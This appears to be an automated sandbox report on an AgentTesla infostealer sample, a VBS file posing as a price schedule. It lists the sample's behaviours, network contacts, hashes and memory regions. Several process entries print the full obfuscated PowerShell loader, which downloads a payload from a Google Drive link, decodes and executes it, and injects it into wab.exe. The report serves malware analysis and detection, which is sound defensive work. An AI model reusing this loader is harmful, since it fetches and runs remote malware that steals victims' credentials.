Analysis Overview
SHA256
841bfb8481e179f4d401d0b58b8230eb7c474914e3ca2e4e550e0dc9ef231113
Threat Level: Known bad
The file RFQINL21052024_PRICE SCHEDULE.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 03:42
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-21 03:42
Reported
2024-05-21 03:44
Platform
win10v2004-20240508-en
Max time kernel
144s
Max time network
140s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 404 set thread context of 2484 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. 
DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. 
DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
memory/916-0-0x00007FFEC3B23000-0x00007FFEC3B25000-memory.dmp
memory/916-1-0x0000024137150000-0x0000024137172000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x341cxg3.ega.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/916-11-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp
memory/916-12-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp
memory/404-15-0x0000000003030000-0x0000000003066000-memory.dmp
memory/404-16-0x0000000005AC0000-0x00000000060E8000-memory.dmp
memory/404-17-0x0000000005A90000-0x0000000005AB2000-memory.dmp
memory/404-18-0x0000000006220000-0x0000000006286000-memory.dmp
memory/404-19-0x0000000006300000-0x0000000006366000-memory.dmp
memory/404-29-0x0000000006370000-0x00000000066C4000-memory.dmp
memory/404-30-0x0000000006930000-0x000000000694E000-memory.dmp
memory/404-31-0x0000000006960000-0x00000000069AC000-memory.dmp
memory/404-32-0x0000000007F90000-0x000000000860A000-memory.dmp
memory/404-33-0x0000000006EB0000-0x0000000006ECA000-memory.dmp
memory/404-34-0x0000000007BD0000-0x0000000007C66000-memory.dmp
memory/404-35-0x0000000007B60000-0x0000000007B82000-memory.dmp
memory/404-36-0x0000000008BC0000-0x0000000009164000-memory.dmp
C:\Users\Admin\AppData\Roaming\Vigesimation.Sor
| MD5 | 3d5345e787f5607ceeab0031c358f539 |
| SHA1 | 19dc82bb214aa4cedc883e99d3d29b196d83a330 |
| SHA256 | dc9e8d1b6623366e4063a886706dc448452d26c216d2c450e9f4c89a963f18d2 |
| SHA512 | 8f57a41e65493c8747dab6c4880e6de94b4eb8b6249a0d4c7063f65952de0c72990e9d9382f43c72142c1351247b1bbe99a915effd81507c2a9f76c12ed2720f |
memory/404-38-0x0000000009170000-0x000000000C2CC000-memory.dmp
memory/916-40-0x00007FFEC3B23000-0x00007FFEC3B25000-memory.dmp
memory/916-41-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp
memory/2484-54-0x0000000001270000-0x00000000024C4000-memory.dmp
memory/2484-55-0x0000000001270000-0x00000000012B2000-memory.dmp
memory/916-58-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp
memory/2484-59-0x0000000023A90000-0x0000000023AE0000-memory.dmp
memory/2484-60-0x0000000023B80000-0x0000000023C12000-memory.dmp
memory/2484-61-0x0000000023A80000-0x0000000023A8A000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 03:42
Reported
2024-05-21 03:44
Platform
win7-20231129-en
Max time kernel
140s
Max time network
146s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2200 set thread context of 2716 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. 
DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. 
DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a 